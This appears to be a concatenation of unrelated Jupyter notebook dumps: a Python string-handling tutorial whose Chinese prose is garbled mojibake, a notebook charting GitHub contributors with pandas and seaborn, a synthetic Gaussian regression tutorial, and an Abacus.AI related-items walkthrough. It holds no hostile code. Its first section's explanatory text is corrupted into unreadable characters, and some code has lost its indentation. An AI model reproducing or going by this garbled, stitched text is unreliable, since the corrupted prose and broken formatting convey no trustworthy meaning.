้่ฆไฝฟ็จๆญฃๅ่กจ่พพๅผๅ re ๆจกๅ
```
from fnmatch import fnmatch, fnmatchcase
fnmatch('foo.txt', '*.txt')
fnmatch('foo.txt', '?oo.txt')
fnmatch('Dat45.csv', 'Dat[0-9]*')
names = ['Dat1.csv', 'Dat2.csv', 'config.ini', 'foo.py']
[name for name in names if fnmatch(name, 'Dat*.csv')]
```
## ๅญ็ฌฆไธฒๆ็ดขๅๆฟๆข
* ๅฏนไบ็ฎๅ็ๅญ้ขๆจกๅผ๏ผ็ดๆฅไฝฟ็จ str.replace() ๆนๆณๅณๅฏ
* ๅฏนไบๅคๆ็ๆจกๅผ๏ผ่ฏทไฝฟ็จ re ๆจกๅไธญ็ sub() ๅฝๆฐ
```
text = 'yeah, but no, but yeah, but no, but yeah'
text
# ๆๆ้ฝไผๆฟๆข
text.replace('yeah', 'yep')
# ๅชๆฟๆขๅ2ไธช
text.replace('yeah', 'yep', 2)
```
## ๅญ็ฌฆไธฒๅฟฝ็ฅๅคงๅฐๅ็ๆ็ดขๆฟๆข
* ไธบไบๅจๆๆฌๆไฝๆถๅฟฝ็ฅๅคงๅฐๅ๏ผไฝ ้่ฆๅจไฝฟ็จ re ๆจกๅ็ๆถๅ็ป่ฟไบๆไฝๆไพ re.IGNORECASE ๆ ๅฟๅๆฐ
```
text = 'UPPER PYTHON, lower python, Mixed Python'
# ๆฅๆพ
re.findall('python', text, flags=re.IGNORECASE)
# ๆฟๆข
re.sub('python', 'snake', text, flags=re.IGNORECASE)
```
## ๅ ้คๅญ็ฌฆไธฒไธญไธ้่ฆ็ๅญ็ฌฆ
* strip() ๆนๆณ่ฝ็จไบๅ ้คๅผๅงๆ็ปๅฐพ็ๅญ็ฌฆใ lstrip() ๅ rstrip() ๅๅซไปๅทฆๅไปๅณๆง่กๅ ้คๆไฝใ ้ป่ฎคๆ
ๅตไธ๏ผ่ฟไบๆนๆณไผๅป้ค็ฉบ็ฝๅญ็ฌฆ๏ผไฝๆฏไฝ ไนๅฏไปฅๆๅฎๅ
ถไปๅญ็ฌฆ
* ๅฆๆไฝ ๆณๅค็ไธญ้ด็็ฉบๆ ผ๏ผ้ฃไนไฝ ้่ฆๆฑๅฉๅ
ถไปๆๆฏใๆฏๅฆไฝฟ็จ replace() ๆนๆณๆ่
ๆฏ็จๆญฃๅ่กจ่พพๅผๆฟๆข
```
# Whitespace stripping
s = ' hello world \n'
s
s.strip()
# ไปๅทฆ่พน
s.lstrip()
s.rstrip()
# Character stripping
t = '-----hello====='
# ๅปๆๅทฆ่พน็ '-'
t.lstrip('-')
# ๅปๆ '-='
t.strip('-=')
```
## ๅญ็ฌฆไธฒๅฏน้ฝ
* ๅฏนไบๅบๆฌ็ๅญ็ฌฆไธฒๅฏน้ฝๆไฝ๏ผๅฏไปฅไฝฟ็จๅญ็ฌฆไธฒ็ ljust() , rjust() ๅ center() ๆนๆณ
* ๅฝๆฐ format() ๅๆ ทๅฏไปฅ็จๆฅๅพๅฎนๆ็ๅฏน้ฝๅญ็ฌฆไธฒใ ไฝ ่ฆๅ็ๅฐฑๆฏไฝฟ็จ <,> ๆ่
^ ๅญ็ฌฆๅ้ข็ดง่ทไธไธชๆๅฎ็ๅฎฝๅบฆ
* ๆๅฎไธไธช้็ฉบๆ ผ็ๅกซๅ
ๅญ็ฌฆ๏ผๅฐๅฎๅๅฐๅฏน้ฝๅญ็ฌฆ็ๅ้ขๅณๅฏ
```
text = 'Hello World'
text.ljust(20)
text.rjust(20)
text.center(20)
text.ljust(20, '*')
text.center(20, '*')
format(text, '>20')
format(text, '<20')
format(text, '^20')
format(text, '=>20s')
'{:>10s} {:>10s}'.format('Hello', 'World')
```
## ๅๅนถๆผๆฅๅญ็ฌฆไธฒ
* ๅฆๆไฝ ๆณ่ฆๅๅนถ็ๅญ็ฌฆไธฒๆฏๅจไธไธชๅบๅๆ่
iterable ไธญ๏ผ้ฃไนๆๅฟซ็ๆนๅผๅฐฑๆฏไฝฟ็จ join() ๆนๆณ
* ๅชๆฏๅๅนถๅฐๆฐๅ ไธชๅญ็ฌฆไธฒ๏ผไฝฟ็จๅ ๅท(+)้ๅธธๅทฒ็ป่ถณๅคไบ
```
str1 = 'hello'
str2 = 'world'
# ็ๆไธไธชๅ
็ป
*str1, *str2
(*str1, *str2)
# list
[*str1, *str2]
# set
{*str1, *str2}
#dict
{key: value for key, value in zip(str1, str2)}
str1.join(str2)
str1 + str2
parts = ['Is', 'Chicago', 'Not', 'Chicago?']
' '.join(parts)
x = [1, 2, 4, -1, 0, 2]
def sam(arg):
yield(arg)
for o in sam(x):
o
```
## ๅญ็ฌฆไธฒไธญๆๅ
ฅๅ้
* Pythonๅนถๆฒกๆๅฏนๅจๅญ็ฌฆไธฒไธญ็ฎๅๆฟๆขๅ้ๅผๆไพ็ดๆฅ็ๆฏๆใ ไฝๆฏ้่ฟไฝฟ็จๅญ็ฌฆไธฒ็ format() ๆนๆณๆฅ่งฃๅณ่ฟไธช้ฎ้ข
* ๅฆๆ่ฆ่ขซๆฟๆข็ๅ้่ฝๅจๅ้ๅไธญๆพๅฐ๏ผ ้ฃไนไฝ ๅฏไปฅ็ปๅไฝฟ็จ format_map() ๅ vars()
```
s = '{name} has {n} messages.'
s.format(name='Guido', n=37)
name = 'Guido'
n = 37
s.format_map(vars())
```
## ไปฅๆๅฎๅๅฎฝๆ ผๅผๅๅญ็ฌฆไธฒ
* ไฝฟ็จ textwrap ๆจกๅๆฅๆ ผๅผๅๅญ็ฌฆไธฒ็่พๅบ
```
# ๅ Linux ไธๆ ท, python ไธญๅๆ ทๅฏไปฅไฝฟ็จ \ ่กจ็คบๆข่ก
s = "Look into my eyes, look into my eyes, the eyes, the eyes, \
the eyes, not around the eyes, don't look around the eyes, \
look into my eyes, you're under."
s
```
## ๅญ่ๅญ็ฌฆไธฒไธ็ๅญ็ฌฆไธฒๆไฝ
* ๅญ่ๅญ็ฌฆไธฒๅๆ ทไนๆฏๆๅคง้จๅๅๆๆฌๅญ็ฌฆไธฒไธๆ ท็ๅ
็ฝฎๆไฝ
* ๅๆ ทไน้็จไบๅญ่ๆฐ็ป
```
data = b'Hello World'
data
data[0:5]
data.startswith(b'Hello')
data.split()
data.replace(b'Hello', b'Hello Cruel')
data = bytearray(b'Hello World')
data
data[0:5]
data.startswith(b'Hello')
data.split()
data.replace(b'Hello', b'Hello Cruel')
```
|
github_jupyter
|
# ๅค่ก็ปๆ่พๅบๆฏๆ
from IPython.core.interactiveshell import InteractiveShell
InteractiveShell.ast_node_interactivity = "all"
line = 'asdf fjdk; afed, fjek,asdf, foo'
import re
re.split(r'[;,\s]\s*', line)
filename = 'spam.txt'
filename.endswith('.txt')
filename.startswith('file:')
url = 'http://www.python.org'
url.startswith('http:')
filenames = [ 'Makefile', 'foo.c', 'bar.py', 'spam.c', 'spam.h' ]
[name.endswith('.py') for name in filenames]
# ๆฏๅฆๅญๅจ True
any(name.endswith('.py') for name in filenames)
from fnmatch import fnmatch, fnmatchcase
fnmatch('foo.txt', '*.txt')
fnmatch('foo.txt', '?oo.txt')
fnmatch('Dat45.csv', 'Dat[0-9]*')
names = ['Dat1.csv', 'Dat2.csv', 'config.ini', 'foo.py']
[name for name in names if fnmatch(name, 'Dat*.csv')]
text = 'yeah, but no, but yeah, but no, but yeah'
text
# ๆๆ้ฝไผๆฟๆข
text.replace('yeah', 'yep')
# ๅชๆฟๆขๅ2ไธช
text.replace('yeah', 'yep', 2)
text = 'UPPER PYTHON, lower python, Mixed Python'
# ๆฅๆพ
re.findall('python', text, flags=re.IGNORECASE)
# ๆฟๆข
re.sub('python', 'snake', text, flags=re.IGNORECASE)
# Whitespace stripping
s = ' hello world \n'
s
s.strip()
# ไปๅทฆ่พน
s.lstrip()
s.rstrip()
# Character stripping
t = '-----hello====='
# ๅปๆๅทฆ่พน็ '-'
t.lstrip('-')
# ๅปๆ '-='
t.strip('-=')
text = 'Hello World'
text.ljust(20)
text.rjust(20)
text.center(20)
text.ljust(20, '*')
text.center(20, '*')
format(text, '>20')
format(text, '<20')
format(text, '^20')
format(text, '=>20s')
'{:>10s} {:>10s}'.format('Hello', 'World')
str1 = 'hello'
str2 = 'world'
# ็ๆไธไธชๅ
็ป
*str1, *str2
(*str1, *str2)
# list
[*str1, *str2]
# set
{*str1, *str2}
#dict
{key: value for key, value in zip(str1, str2)}
str1.join(str2)
str1 + str2
parts = ['Is', 'Chicago', 'Not', 'Chicago?']
' '.join(parts)
x = [1, 2, 4, -1, 0, 2]
def sam(arg):
yield(arg)
for o in sam(x):
o
s = '{name} has {n} messages.'
s.format(name='Guido', n=37)
name = 'Guido'
n = 37
s.format_map(vars())
# ๅ Linux ไธๆ ท, python ไธญๅๆ ทๅฏไปฅไฝฟ็จ \ ่กจ็คบๆข่ก
s = "Look into my eyes, look into my eyes, the eyes, the eyes, \
the eyes, not around the eyes, don't look around the eyes, \
look into my eyes, you're under."
s
data = b'Hello World'
data
data[0:5]
data.startswith(b'Hello')
data.split()
data.replace(b'Hello', b'Hello Cruel')
data = bytearray(b'Hello World')
data
data[0:5]
data.startswith(b'Hello')
data.split()
data.replace(b'Hello', b'Hello Cruel')
| 0.233532 | 0.754553 |
# Use the GitHub API to visualize project contributions
```
import os
import re
import pandas
import requests
import matplotlib
import matplotlib.pyplot as plt
import seaborn
%matplotlib inline
```
## Utilities for querying the GitHub API
```
def query(format_url, **kwargs):
url = format_url.format(**kwargs)
response = requests.get(url)
obj = response.json()
df = pandas.DataFrame(obj)
return df
def concat_queries(format_url, kwargs_list):
dfs = list()
for kwargs in kwargs_list:
df = query(format_url, **kwargs)
for key, value in kwargs.items():
df[key] = value
dfs.append(df)
return pandas.concat(dfs)
```
## Retrieve contribution data
```
repo_df = query('https://api.github.com/orgs/cognoma/repos')
repo_df.name.tolist()
format_url = 'https://api.github.com/repos/cognoma/{repo_name}/contributors'
kwargs_list = [{'repo_name': repo} for repo in repo_df.name]
contrib_df = concat_queries(format_url, kwargs_list)
```
## Contribution count heatmap: repository versus user
```
contrib_plot_df = (contrib_df
.pivot_table('contributions', 'repo_name', 'login', fill_value=0)
)
cmap = seaborn.cubehelix_palette(light=1, as_cmap=True, gamma=15)
ax = seaborn.heatmap(contrib_plot_df, square=True, linewidths=0.5, cmap=cmap, linecolor='#d3d3d3', xticklabels=1)
plt.xticks(rotation=90, color='#3f3f3f', fontsize=9)
plt.yticks(color='#3f3f3f', fontsize=9)
plt.ylabel('')
plt.xlabel('')
fig = ax.get_figure()
fig.set_size_inches(w=8.3, h=2.6)
fig.savefig('contribution-heatmap.png', dpi=200, bbox_inches='tight')
fig.savefig('contribution-heatmap.svg', bbox_inches='tight')
# Save user-by-repo contribution count data
contrib_plot_df.transpose().to_csv('contribution-by-repo.tsv', sep='\t')
```
## Create a total contribution summary table
```
# Extract maintainers from the repository README
path = os.path.join('..', 'README.md')
with open(path) as read_file:
readme = read_file.read()
pattern = r'@\*\*(.+?)\*\*'
maintainers = re.findall(pattern, readme)
maintainers = sorted(set(maintainers))
maintainer_df = pandas.DataFrame({'login': maintainers, 'maintainer': 1})
maintainer_df.head(2)
# Total contributions per user excluding sandbox
summary_df = (contrib_plot_df
.query("repo_name != 'sandbox'")
.sum(axis='rows')
.rename('contributions')
.reset_index()
.query('contributions > 0')
.merge(maintainer_df, how='outer')
.fillna(0)
.sort_values(['maintainer', 'contributions', 'login'], ascending=[False, False, True])
)
for column in 'contributions', 'maintainer':
summary_df[column] = summary_df[column].astype(int)
summary_df.to_csv('contributor-summary.tsv', sep='\t', index=False)
summary_df.head(2)
```
|
github_jupyter
|
import os
import re
import pandas
import requests
import matplotlib
import matplotlib.pyplot as plt
import seaborn
%matplotlib inline
def query(format_url, **kwargs):
url = format_url.format(**kwargs)
response = requests.get(url)
obj = response.json()
df = pandas.DataFrame(obj)
return df
def concat_queries(format_url, kwargs_list):
dfs = list()
for kwargs in kwargs_list:
df = query(format_url, **kwargs)
for key, value in kwargs.items():
df[key] = value
dfs.append(df)
return pandas.concat(dfs)
repo_df = query('https://api.github.com/orgs/cognoma/repos')
repo_df.name.tolist()
format_url = 'https://api.github.com/repos/cognoma/{repo_name}/contributors'
kwargs_list = [{'repo_name': repo} for repo in repo_df.name]
contrib_df = concat_queries(format_url, kwargs_list)
contrib_plot_df = (contrib_df
.pivot_table('contributions', 'repo_name', 'login', fill_value=0)
)
cmap = seaborn.cubehelix_palette(light=1, as_cmap=True, gamma=15)
ax = seaborn.heatmap(contrib_plot_df, square=True, linewidths=0.5, cmap=cmap, linecolor='#d3d3d3', xticklabels=1)
plt.xticks(rotation=90, color='#3f3f3f', fontsize=9)
plt.yticks(color='#3f3f3f', fontsize=9)
plt.ylabel('')
plt.xlabel('')
fig = ax.get_figure()
fig.set_size_inches(w=8.3, h=2.6)
fig.savefig('contribution-heatmap.png', dpi=200, bbox_inches='tight')
fig.savefig('contribution-heatmap.svg', bbox_inches='tight')
# Save user-by-repo contribution count data
contrib_plot_df.transpose().to_csv('contribution-by-repo.tsv', sep='\t')
# Extract maintainers from the repository README
path = os.path.join('..', 'README.md')
with open(path) as read_file:
readme = read_file.read()
pattern = r'@\*\*(.+?)\*\*'
maintainers = re.findall(pattern, readme)
maintainers = sorted(set(maintainers))
maintainer_df = pandas.DataFrame({'login': maintainers, 'maintainer': 1})
maintainer_df.head(2)
# Total contributions per user excluding sandbox
summary_df = (contrib_plot_df
.query("repo_name != 'sandbox'")
.sum(axis='rows')
.rename('contributions')
.reset_index()
.query('contributions > 0')
.merge(maintainer_df, how='outer')
.fillna(0)
.sort_values(['maintainer', 'contributions', 'login'], ascending=[False, False, True])
)
for column in 'contributions', 'maintainer':
summary_df[column] = summary_df[column].astype(int)
summary_df.to_csv('contributor-summary.tsv', sep='\t', index=False)
summary_df.head(2)
| 0.373419 | 0.694847 |
# Purpose
This notebook shows how to generate multivariate gaussian data. In some experimental settings, you might find yourself having to create synthetic data to test out some algorithms. What's a better way than to test your ideas on a controlled multivariate gaussian data set?
# Synthetic Data Generation
Here we generate synthetic data with 4 variables defined as follows.
* $X_0 \sim \mathcal{N}(0.0, 1.0)$
* $X_1 \sim \mathcal{N}(1.0, 1.5)$
* $X_2 \sim \mathcal{N}(-8, 2.0)$
* $Y \sim \mathcal{N}(3 + 2.5 \times X_0 + 1.8 \times X_1 + 0.3 \times X_2, 1.0)$
```
import numpy as np
np.random.seed(37)
N = 10000
x0 = np.random.normal(0, 1, N)
x1 = np.random.normal(1, 1.5, N)
x2 = np.random.normal(-8, 2.0, N)
y = np.random.normal(3 + (2.5 * x0) + (1.8 * x1) + (0.3 * x2), 1, N)
```
# Visualize Synthetic Data
Let's visualize the distribution of the variables individually.
```
%matplotlib inline
import seaborn as sns
import matplotlib.pyplot as plt
fig, ax = plt.subplots(2, 2, figsize=(15, 10))
ax = np.ravel(ax)
for n, x, a in zip(['x_0', 'x_1', 'x_2', 'y'], [x0, x1, x2, y], ax):
sns.distplot(x, ax=a)
mu = np.mean(x)
std = np.std(x)
a.set_title(r'${}$, mean={:.2f}, std={:.2f}'.format(n, mu, std))
a.set_xlabel(r'${}$'.format(n))
a.set_ylabel(r'$p({})$'.format(n))
plt.tight_layout()
```
# Learning
Let's form a data matrix from the variables and see if we can use regression to learn from the data. Note that the regression coefficients are almost perfectly recovered and the $r^2$ values is nearly 1.0.
```
data = np.concatenate([
x0.reshape(-1, 1),
x1.reshape(-1, 1),
x2.reshape(-1, 1),
y.reshape(-1, 1)], axis=1)
X = data[:, [0, 1, 2]]
y = data[:, [3]]
from sklearn.linear_model import LinearRegression
from sklearn.metrics import r2_score
model = LinearRegression()
model.fit(X, y)
print(model.intercept_)
print(model.coef_)
y_pred = model.predict(X)
print(r2_score(y, y_pred))
```
# A slightly more complicated example
Here, we synthesize data in a slightly more complicated way. Note that the dependence on y is only on $X_2$.
* $X_0 \sim \mathcal{N}(0.0, 1.0)$
* $X_1 \sim \mathcal{N}(1.0, 1.5)$
* $X_2 \sim \mathcal{N}(2.5 \times X_0 + 1.8 \times X_1, 1.0)$
* $Y \sim \mathcal{N}(3 + 0.3 \times X_2, 1.0)$
```
N = 10000
x0 = np.random.normal(0, 1, N)
x1 = np.random.normal(1, 1.5, N)
x2 = np.random.normal(2.5 * x0 + 1.8 * x1, 1.0, N)
y = np.random.normal(3 + 0.3 * x2, 1.0, N)
fig, ax = plt.subplots(2, 2, figsize=(15, 10))
ax = np.ravel(ax)
for n, x, a in zip(['x_0', 'x_1', 'x_2', 'y'], [x0, x1, x2, y], ax):
sns.distplot(x, ax=a)
mu = np.mean(x)
std = np.std(x)
a.set_title(r'${}$, mean={:.2f}, std={:.2f}'.format(n, mu, std))
a.set_xlabel(r'${}$'.format(n))
a.set_ylabel(r'$p({})$'.format(n))
plt.tight_layout()
```
Note that the regression coefficients are nearly perfect to the model but the $r^2$ values is nearly close to 0.6. The coefficients for $X_0$ and $X_1$ are basically 0 (zero).
```
data = np.concatenate([
x0.reshape(-1, 1),
x1.reshape(-1, 1),
x2.reshape(-1, 1),
y.reshape(-1, 1)], axis=1)
X = data[:, [0, 1, 2]]
y = data[:, [3]]
model = LinearRegression()
model.fit(X, y)
print(model.intercept_)
print(model.coef_)
y_pred = model.predict(X)
print(r2_score(y, y_pred))
```
# A very difficult example
Here, $X_2$ depends on $X_0$ and $X_1$, $Y$ depends on $X_2$, and $X_3$ depends on $Y$. Let's see what we get when attempting to learn a regression model from this data.
* $X_0 \sim \mathcal{N}(0.0, 1.0)$
* $X_1 \sim \mathcal{N}(1.0, 1.5)$
* $X_2 \sim \mathcal{N}(2.5 \times X_0 + 1.8 \times X_1, 1.0)$
* $Y \sim \mathcal{N}(3 + 0.3 \times X_2, 1.0)$
* $X_3 \sim \mathcal{N}(2 + 5.5 \times Y, 1.0)$
```
N = 10000
x0 = np.random.normal(0, 1, N)
x1 = np.random.normal(1, 1.5, N)
x2 = np.random.normal(2.5 * x0 + 1.8 * x1, 1, N)
y = np.random.normal(3 + 0.3 * x2, 1, N)
x3 = np.random.normal(2 + 5.5 * y, 1, N)
data = np.concatenate([
x0.reshape(-1, 1),
x1.reshape(-1, 1),
x2.reshape(-1, 1),
x3.reshape(-1, 1),
y.reshape(-1, 1)], axis=1)
X = data[:, [0, 1, 2, 3]]
y = data[:, [4]]
model = LinearRegression()
model.fit(X, y)
print(model.intercept_)
print(model.coef_)
y_pred = model.predict(X)
print(r2_score(y, y_pred))
```
Note that the only coeffcient larger than 0.01 is $X3$. One may be mistaken to say that $Y$ depends on $X3$ (because we simulated $X3$ from $Y$). It's interesting that $r^2$ is high though.
|
github_jupyter
|
import numpy as np
np.random.seed(37)
N = 10000
x0 = np.random.normal(0, 1, N)
x1 = np.random.normal(1, 1.5, N)
x2 = np.random.normal(-8, 2.0, N)
y = np.random.normal(3 + (2.5 * x0) + (1.8 * x1) + (0.3 * x2), 1, N)
%matplotlib inline
import seaborn as sns
import matplotlib.pyplot as plt
fig, ax = plt.subplots(2, 2, figsize=(15, 10))
ax = np.ravel(ax)
for n, x, a in zip(['x_0', 'x_1', 'x_2', 'y'], [x0, x1, x2, y], ax):
sns.distplot(x, ax=a)
mu = np.mean(x)
std = np.std(x)
a.set_title(r'${}$, mean={:.2f}, std={:.2f}'.format(n, mu, std))
a.set_xlabel(r'${}$'.format(n))
a.set_ylabel(r'$p({})$'.format(n))
plt.tight_layout()
data = np.concatenate([
x0.reshape(-1, 1),
x1.reshape(-1, 1),
x2.reshape(-1, 1),
y.reshape(-1, 1)], axis=1)
X = data[:, [0, 1, 2]]
y = data[:, [3]]
from sklearn.linear_model import LinearRegression
from sklearn.metrics import r2_score
model = LinearRegression()
model.fit(X, y)
print(model.intercept_)
print(model.coef_)
y_pred = model.predict(X)
print(r2_score(y, y_pred))
N = 10000
x0 = np.random.normal(0, 1, N)
x1 = np.random.normal(1, 1.5, N)
x2 = np.random.normal(2.5 * x0 + 1.8 * x1, 1.0, N)
y = np.random.normal(3 + 0.3 * x2, 1.0, N)
fig, ax = plt.subplots(2, 2, figsize=(15, 10))
ax = np.ravel(ax)
for n, x, a in zip(['x_0', 'x_1', 'x_2', 'y'], [x0, x1, x2, y], ax):
sns.distplot(x, ax=a)
mu = np.mean(x)
std = np.std(x)
a.set_title(r'${}$, mean={:.2f}, std={:.2f}'.format(n, mu, std))
a.set_xlabel(r'${}$'.format(n))
a.set_ylabel(r'$p({})$'.format(n))
plt.tight_layout()
data = np.concatenate([
x0.reshape(-1, 1),
x1.reshape(-1, 1),
x2.reshape(-1, 1),
y.reshape(-1, 1)], axis=1)
X = data[:, [0, 1, 2]]
y = data[:, [3]]
model = LinearRegression()
model.fit(X, y)
print(model.intercept_)
print(model.coef_)
y_pred = model.predict(X)
print(r2_score(y, y_pred))
N = 10000
x0 = np.random.normal(0, 1, N)
x1 = np.random.normal(1, 1.5, N)
x2 = np.random.normal(2.5 * x0 + 1.8 * x1, 1, N)
y = np.random.normal(3 + 0.3 * x2, 1, N)
x3 = np.random.normal(2 + 5.5 * y, 1, N)
data = np.concatenate([
x0.reshape(-1, 1),
x1.reshape(-1, 1),
x2.reshape(-1, 1),
x3.reshape(-1, 1),
y.reshape(-1, 1)], axis=1)
X = data[:, [0, 1, 2, 3]]
y = data[:, [4]]
model = LinearRegression()
model.fit(X, y)
print(model.intercept_)
print(model.coef_)
y_pred = model.predict(X)
print(r2_score(y, y_pred))
| 0.651133 | 0.987664 |
## How-to guide for Related Items use-case on Abacus.AI platform
This notebook provides you with a hands on environment to build a model that suggests related items using the Abacus.AI Python Client Library.
We'll be using the [User Item Recommendations](https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/user_movie_ratings.csv), [Movie Attributes](https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/movies_metadata.csv), and [User Attributes](https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/users_metadata.csv) datasets, each of which has information about the user and/or their choice of movies.
1. Install the Abacus.AI library.
```
!pip install abacusai
```
We'll also import pandas and pprint tools for visualization in this notebook.
```
import pandas as pd # A tool we'll use to download and preview CSV files
import pprint # A tool to pretty print dictionary outputs
pp = pprint.PrettyPrinter(indent=2)
```
2. Add your Abacus.AI [API Key](https://abacus.ai/app/profile/apikey) generated using the API dashboard as follows:
```
#@title Abacus.AI API Key
api_key = '' #@param {type: "string"}
```
3. Import the Abacus.AI library and instantiate a client.
```
from abacusai import ApiClient
client = ApiClient(api_key)
```
## 1. Create a Project
Abacus.AI projects are containers that have datasets and trained models. By specifying a business **Use Case**, Abacus.AI tailors the deep learning algorithms to produce the best performing model possible for your data.
We'll call the `list_use_cases` method to retrieve a list of the available Use Cases currently available on the Abacus.AI platform.
```
client.list_use_cases()
```
In this notebook, we're going to create a model that suggests related items using the User Item Recommendations, Movie Attributes, and User Attributes datasets. The 'USER_RELATED' use case is best tailored for this situation. For the purpose of taking an example, we will use the IMDB movie dataset that has movie metadata, user metadata, and user-movie ratings.
```
#@title Abacus.AI Use Case
use_case = 'USER_RELATED' #@param {type: "string"}
```
By calling the `describe_use_case_requirements` method we can view what datasets are required for this use_case.
```
for requirement in client.describe_use_case_requirements(use_case):
pp.pprint(requirement.to_dict())
```
Finally, let's create the project.
```
related_items_project = client.create_project(name='Related Movies', use_case=use_case)
related_items_project.to_dict()
```
**Note: When feature_groups_enabled is False then the use case does not support feature groups (collection of ML features). Therefore, Datasets are created at the organization level and tied to a project to further use them for training ML models**
## 2. Add Datasets to your Project
Abacus.AI can read datasets directly from `AWS S3` or `Google Cloud Storage` buckets, otherwise you can also directly upload and store your datasets with Abacus.AI. For this notebook, we will have Abacus.AI read the datasets directly from a public S3 bucket's location.
We are using three datasets for this notebook. We'll tell Abacus.AI how the datasets should be used when creating it by tagging each dataset with a special Abacus.AI **Dataset Type**.
- [User Item Recommendations](https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/user_movie_ratings.csv) (**USER_ITEM_INTERACTIONS**):
This dataset contains information about multiple users' ratings of movies with specified IDs.
- [Movie Attributes](https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/movies_metadata.csv) (**CATALOG_ATTRIBUTES**): This dataset contains attributes about movies with specified IDs, such as each movie's name and genre.
- [User Attributes](https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/users_metadata.csv) (**USER_ATTRIBUTES**): This dataset contains information about users with specified IDs, such as their age, gender, occupation, and zip code.
### Add the datasets to Abacus.AI
First we'll use Pandas to preview the files, then add them to Abacus.AI.
```
pd.read_csv('https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/user_movie_ratings.csv')
pd.read_csv('https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/movies_metadata.csv')
pd.read_csv('https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/users_metadata.csv')
```
Using the Create Dataset API, we can tell Abacus.AI the public S3 URI of where to find the datasets. We will also give each dataset a Refresh Schedule, which tells Abacus.AI when it should refresh the dataset (take an updated/latest copy of the dataset).
If you're unfamiliar with Cron Syntax, Crontab Guru can help translate the syntax back into natural language: [https://crontab.guru/#0_12_\*_\*_\*](https://crontab.guru/#0_12_*_*_*)
**Note: This cron string will be evaluated in UTC time zone**
```
user_item_dataset = client.create_dataset_from_file_connector(name='User Item Recommendations', table_name='User_Item_Recommendations',
location='s3://realityengines.exampledatasets/user_recommendations/user_movie_ratings.csv',
refresh_schedule='0 12 * * *')
movie_attributes_dataset = client.create_dataset_from_file_connector(name='Movie Attributes', table_name='Movie_Attributes',
location='s3://realityengines.exampledatasets/user_recommendations/movies_metadata.csv',
refresh_schedule='0 12 * * *')
user_attributes_dataset = client.create_dataset_from_file_connector(name='User Attributes', table_name='User_Attributes',
location='s3://realityengines.exampledatasets/user_recommendations/users_metadata.csv',
refresh_schedule='0 12 * * *')
datasets = [user_item_dataset, movie_attributes_dataset, user_attributes_dataset]
for dataset in datasets:
dataset.wait_for_inspection()
```
## 3. Create Feature Groups and add them to your Project
Datasets are created at the organization level and can be used to create feature groups as follows:
```
feature_group = client.create_feature_group(table_name='Related_Items1',sql='select * from User_Item_Recommendations')
```
Adding Feature Group to the project:
```
client.add_feature_group_to_project(feature_group_id=feature_group.feature_group_id,project_id = related_items_project.project_id)
```
Setting the Feature Group type according to the use case requirements:
```
client.set_feature_group_type(feature_group_id=feature_group.feature_group_id, project_id = related_items_project.project_id, feature_group_type= "USER_ITEM_INTERACTIONS")
```
Check current Feature Group schema:
```
client.get_feature_group_schema(feature_group_id=feature_group.feature_group_id)
```
#### For each **Use Case**, there are special **Column Mappings** that must be applied to a column to fulfill use case requirements. We can find the list of available **Column Mappings** by calling the *Describe Use Case Requirements* API:
```
client.describe_use_case_requirements(use_case)[0].allowed_feature_mappings
client.set_feature_mapping(project_id=related_items_project.project_id, feature_group_id= feature_group.feature_group_id, feature_name='movie_id', feature_mapping='ITEM_ID')
client.set_feature_mapping(project_id=related_items_project.project_id, feature_group_id= feature_group.feature_group_id,feature_name='user_id', feature_mapping='USER_ID')
client.set_feature_mapping(project_id=related_items_project.project_id, feature_group_id= feature_group.feature_group_id,feature_name='timestamp', feature_mapping='TIMESTAMP')
```
For each required Feature Group Type within the use case, you must assign the Feature group to be used for training the model:
```
client.use_feature_group_for_training(project_id=related_items_project.project_id, feature_group_id=feature_group.feature_group_id)
```
Now that we've our feature groups assigned, we're almost ready to train a model!
To be sure that our project is ready to go, let's call project.validate to confirm that all the project requirements have been met:
```
related_items_project.validate()
```
## 4. Train a Model
For each **Use Case**, Abacus.AI has a bunch of options for training. We can call the *Get Training Config Options* API to see the available options.
```
related_items_project.get_training_config_options()
```
In this notebook, we'll just train with the default options, but definitely feel free to experiment, especially if you have familiarity with Machine Learning.
```
related_items_model = related_items_project.train_model(training_config={})
related_items_model.to_dict()
```
After we start training the model, we can call this blocking call that routinely checks the status of the model until it is trained and evaluated:
```
related_items_model.wait_for_evaluation()
```
**Note that model training might take some minutes to some hours depending upon the size of datasets, complexity of the models being trained and a variety of other factors**
## **Checkpoint** [Optional]
As model training can take an hours to complete, your page could time out or you might end up hitting the refresh button, this section helps you restore your progress:
```
!pip install abacusai
import pandas as pd
import pprint
pp = pprint.PrettyPrinter(indent=2)
api_key = '' #@param {type: "string"}
from abacusai import ApiClient
client = ApiClient(api_key)
related_items_project = next(project for project in client.list_projects() if project.name == 'Related Movies')
related_items_model = related_items_project.list_models()[-1]
related_items_model.wait_for_evaluation()
```
## Evaluate your Model Metrics
After your model is done training you can inspect the model's quality by reviewing the model's metrics:
```
pp.pprint(related_items_model.get_metrics().to_dict())
```
To get a better understanding on what these metrics mean, visit our [documentation](https://abacus.ai/app/help/useCases/USER_RELATED/training) page.
## 5. Deploy Model
After the model has been trained, we need to deploy the model to be able to start making predictions. Deploying a model will reserve cloud resources to host the model for Realtime and/or batch predictions.
```
related_items_deployment = client.create_deployment(name='Related Items Deployment',description='Related Items Deployment',model_id=related_items_model.model_id)
related_items_deployment.wait_for_deployment()
```
After the model is deployed, we need to create a deployment token for authenticating prediction requests. This token is only authorized to predict on deployments in this project, so it's safe to embed this token inside of a user-facing application or website.
```
deployment_token = related_items_project.create_deployment_token().deployment_token
deployment_token
```
## 6. Predict
Now that you have an active deployment and a deployment token to authenticate requests, you can make the `get_related_items` API call below.
This command will return a list of related items based on the provided user_id (1) and movie_id (466). The related items list would be determined based on what movies the user liked in the past and how the movies and users are related to each other depending on their attributes.
```
ApiClient().get_related_items(deployment_token=deployment_token,
deployment_id=related_items_deployment.deployment_id,
query_data={"user_id":"1","movie_id":"466"})
```
|
github_jupyter
|
!pip install abacusai
import pandas as pd # A tool we'll use to download and preview CSV files
import pprint # A tool to pretty print dictionary outputs
pp = pprint.PrettyPrinter(indent=2)
